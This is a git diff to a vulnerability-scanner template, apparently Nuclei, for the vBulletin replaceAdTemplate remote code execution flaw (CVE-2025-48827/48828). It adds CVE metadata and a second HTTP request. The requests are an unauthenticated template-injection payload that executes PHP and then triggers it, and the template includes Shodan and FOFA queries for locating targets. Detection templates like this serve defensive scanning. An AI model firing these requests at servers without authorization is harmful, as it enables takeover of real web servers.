diff --git a/http/vulnerabilities/vbulletin/vbulletin-replacead-rce.yaml b/http/vulnerabilities/vbulletin/vbulletin-replacead-rce.yaml
index 4d9ef0b6d5cf..f6ae30ce6746 100644
--- a/http/vulnerabilities/vbulletin/vbulletin-replacead-rce.yaml
+++ b/http/vulnerabilities/vbulletin/vbulletin-replacead-rce.yaml
@@ -2,7 +2,7 @@ id: vbulletin-replacead-rce
 
 info:
   name: vBulletin replaceAdTemplate - Remote Code Execution
-  author: DhiyaneshDK
+  author: DhiyaneshDK, Chocapikk
   severity: critical
   description: |
     vBulletin versions 5.0.0 through 6.0.3 contain a Remote Code Execution (RCE) vulnerability in the ajax/api/ad/replaceAdTemplate endpoint. This flaw arises from improper use of PHP's Reflection API, allowing unauthenticated attackers to invoke protected controller methods. By injecting a crafted <vb:if> conditional that executes arbitrary PHP code via passthru($_POST[<param>]), and triggering it with a second request to ajax/render/ad_<location>, attackers can run arbitrary commands on the server as the webserver user.
@@ -13,8 +13,15 @@ info:
   reference:
     - https://karmainsecurity.com/pocs/vBulletin-replaceAdTemplate-RCE.php
     - https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rce
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-48827
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-48828
   classification:
     cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:*
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10
+    cve-id: CVE-2025-48827, CVE-2025-48828
+    cwe-id: CWE-424
+
   metadata:
     verified: true
     max-request: 1
@@ -22,7 +29,7 @@ info:
     product: vbulletin
     fofa-query: app="vBulletin"
     shodan-query: http.component:"vBulletin"
-  tags: rce,vbulletin,intrusive
+  tags: cve,cve2025,rce,vbulletin,intrusive
 
 variables:
   rand_string: "{{to_lower(rand_base(5))}}"
@@ -36,12 +43,23 @@ http:
         Content-Type: application/x-www-form-urlencoded
 
         routestring=ajax/api/ad/replaceAdTemplate&styleid=1&location={{rand_string}}&template=<vb:if condition='"var_dump"("{{rand_value}}")'></vb:if>
-
     matchers:
       - type: dsl
         dsl:
-          - contains(content_type,'application/json')
+          - status_code == 200
           - contains_all(body,'string(5)','{{rand_value}}')
+        condition: and
+
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        routestring=ajax/render/ad_{{rand_string}}
+    matchers:
+      - type: dsl
+        dsl:
           - status_code == 200
+          - contains_all(body,'string(5)','{{rand_value}}')
         condition: and
-# digest: 4a0a00473045022039d5fe53f2231bbabadaf62fc548eedf67c6fbffc543aa29a6e96fcd690d9f3d022100a7d55e33136c01b5c3bbbe57691e3cddbc419cba3c4fcf24c313d1e3fe71795b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file